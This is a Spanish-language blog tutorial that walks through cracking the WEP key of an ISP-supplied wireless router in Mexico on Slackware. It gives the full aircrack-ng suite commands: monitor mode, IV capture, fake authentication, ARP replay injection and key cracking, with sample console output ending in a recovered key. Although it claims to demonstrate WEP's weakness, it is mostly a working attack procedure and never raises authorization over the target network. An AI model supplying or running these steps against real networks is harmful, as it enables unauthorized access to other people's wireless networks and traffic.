Descifrar clave wep con Slackware.

En esta ocasión voy a compartir contigo la forma de como obtener (y de paso demostrar que tan vulnerable es) la clave WEP de un aparato de estos que proporcionan en México en su gran mayoria y que nos brindan servicio de internet, si no sabes de que modem o de que compañia te estoy hablando más adelante lo averiguarás. Para esto vamos a trabajar desde la consola como superusuario (root).

Antes que nada te enlisto las herramientas (hardware y software) que yo utilicé:

a) Una PC con Linux, como el nombre del post lo indica utilizo Slackware 12.2 con una version de kernel 2.6.27.7.

b) Tarjeta de red inalambrica, la que tengo es una Atheros, te dejo información mas a detalle:

# PCI device 0x168c:0x001a (ath5k_pci)
SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{address}=="00:11:22:33:44:55", ATTR{type}=="1", KERNEL=="wlan*", NAME="wlan0"

¿Como obtienes todos estos datos?, fácil como root revisa el archivo /etc/udev/rules.d/70-persistent-net.rules.

También puedes obtener información con el comando:

# ifconfig

el cual te debe regresar lo siguiente:

wlan0     Link encap:Ethernet  HWaddr 00:11:22:33:44:55
UP BROADCAST MULTICAST  MTU:1500  Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

o también con el comando:

# iwconfig

Con este ultimo se enlistan todas las interfaces inalambricas, las que no lo son aparecen con el mensaje “no wireless extensions”.

En cualquiera de los tres casos copiate el nombre y la MAC de tu intefaz que los vamos a utilizar mas adelante.

Nota:
Como puedes observar el nombre de mi tarjeta de red inalambrica es wlan0, la tuya puede ser igual o diferente, depende de la computadora que este utilizando (de aqui en adelante debes de poner el nombre de tu tarjeta en donde yo utilizo wlan0).

Además tu tarjeta debe contar con soporte de inyección de paquetes.

c) La red inalambrica que debe estar a tu alcance.

Ahora, para mi caso el sistema me solicitó un paquete al momento de querer poner mi tarjeta de red en modo monitor, el error era:

ERROR: Neither the sysfs interface links nor the iw command is available.
http://wireless.kernel.org/download/iw/iw-0.9.19.tar.bz2

Pero antes de instalar el paquete iw requerí de otro llamado Libnl.

El error que el sistema me mostraba al querer instalar iw era:

Makefile:38: *** Cannot find development files for any supported version of libnl.  Stop.

Instalamos Libnl:

# installpkg libnl-1.1-i686-2as.tgz

Ahora si, ya puedes instalar iw:

# tar -xjvf iw-0.9.20.tar.bz2
# cd iw-0.9.20
# make
# make install

Y desde luego procedemos a instalar el paquete de aircrack asi:

# tar -xzvf aircrack-ng-1.1.tar.gz
# cd aircrack-ng-1.1
# make
# make install

Necesitamos conseguir el MAC,ESSID y canal del AP del cual queremos obtener la clave WEP, pero ¿Como lo puedes obtener?, fácil, desde la consola teclea:

# iwlist wlan0 scan

Con esto obtienes la información siguiente:

wlan0     Scan completed :
Cell 01 - Address: 01:02:03:04:05:06
ESSID:"INFINITUM0009"
Mode:Master
Channel:1
Frequency:2.412 GHz (Channel 1)
Quality=20/100  Signal level:-83 dBm  Noise level=-96 dBm
Encryption key:on
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
48 Mb/s; 54 Mb/s
Extra:tsf=000000004b79f5b6
Extra: Last beacon: 1000ms ago

Nota: Los datos (MAC, ESSID y Channel) que estoy poniendo para el AP no son reales, asegurate de utilizar los que a ti te regresa la consola.

Ya tenemos todo lo necesario para iniciar, que esperas sigue leyendo …

Como primer número debes iniciar tu tarjeta de red en modo monitor, abre una consola y teclea lo siguiente:

# airmon-ng start wlan0

Debes de visualizar en pantalla la información siguiente:

Interface       Chipset         Driver

wlan0           Atheros         ath5k - [phy0]
(monitor mode enabled on mon0)

Lo cual quiere decir que el modo monitor se ha habilitado correctamente para la interfaz wlan0, algo bien importante es que con este paso el sistema renombra a wlan0 por mon0.

Abre otra ventana de consola y escribe lo siguiente:

# airodump-ng --ivs --bssid 01:02:03:04:05:06 -w hackfile -c 1 mon0

donde:

--ivs: solo captura los paquetes IVS
--bssid 01:02:03:04:05:06: la dirección MAC del AP
-w hackfile: Nombre del archivo donde vamos a guardar los paquetes capturados).
-c 1: Número de canal del AP (este valor puede variar).
mon0: La interface de red.

Con esto airdump-ng inicia la captura de paquetes y los guarda en el archivo que indicaste (hackfile), para lo cual se crea el hackfile-01.ivs en el directorio actual de trabajo.

Ahora procedemos a realizar la autenticacion y reinyeccion de paquetes, abre otra nueva ventana de consola (sin cerrar la anterior) y teclea el comando siguiente:

# aireplay-ng -1 6 -e INFINITUM0009 -a 01:02:03:04:05:06 -h 00:11:22:33:44:55 mon0

17:47:06  Waiting for beacon frame (BSSID: 01:02:03:04:05:06) on channel 1

17:47:06  Sending Authentication Request (Open System)
17:47:06  Authentication successful
17:47:06  Sending Association Request
17:47:06  Association successful :-) (AID: 1)

Si no recibimos un mensaje de error en pantalla y visualizas el mensaje anterior quiere decir que ya nos autenticamos con éxito, ahora sólo hay que realizar la reinyeccion de paquetes, abre otra ventana de consola y teclea:

# aireplay-ng -3 -b 01:02:03:04:05:06 -h 00:11:22:33:44:55 mon0

Este comando hara que el campo #Data empieze a incrementarse a una tasa mayor que la inicial, cuando éste oscile entre los 250000 paquetes puedes saltar al paso siguiente

Ya para finalizar vamos a obtener la clave WEP, abre otra ventana de consola y escribe el comando:

# aircrack-ng hackfile-01.ivs

Esperamos a que aircrack-ng nos devuelva la clave.

Opening hackfile-01.ivs
Read 83118 packets.

#  BSSID              ESSID                     Encryption

1  01:02:03:04:05:06  INFINITUM0009             WEP (83117 IVs)

Choosing first network as target.

Opening hackfile-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 83601 ivs.
KEY FOUND! [ 12:23:34:45:56 ]
Decrypted correctly: 100%

listo!, ya tienes la clave WEP la cual es 1223344556 (para efectos de esta manual).

Todo este procedimiento también lo puedes realizar con una distro especializada en auditorias de seguridad para redes wireless y que es ocupada en su mayoria si no es que casi por todo mundo, me refiero a wifislax, una herramienta muy poderosa y fácil de utilizar. Yo aqui te presente solo una de tantas formas de como hacer esta operación pero con Slackware, asumo también que como eres un usuario de "Slack" sabes instalar paquetes y te mueves a traves de la consola sin ningún problema. En cambio si has llegado hasta aqui y eres un usuario que nunca ha usuado Linux o que apenas empiezas a utilizarlo, te recomiendo que utilices WifiSlax por la simplicidad que ésta ofrece, aunque esto no quiere decir que la información que aqui te presenté no te vaya a servir, sino todo lo contrario puedes conseguir tu objetivo omitiendo algunos pasos aqui mostrados.

Te preguntaras porque con Slackware, por la simple razón que es la distro con la que actualmente trabajo, además de que casi no hay información referente o basada en esta distribución.

Ya para finalizar, toda la redacción de los pasos trate de escribirlos tal cual los lleve a acabo, aunque esto no quiere decir que este libre de errores o que puedan mejorarse, de igual manera quiero agradecer a todos aquellos usuarios que comparten información en la red de forma desinteresada, y creo que una forma de agradecimiento es también colaborando, poniendo mi granito de arena haciendo llegar a todos ustedes este manual.

Acerca de Moycas
Developer Web @moycc

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s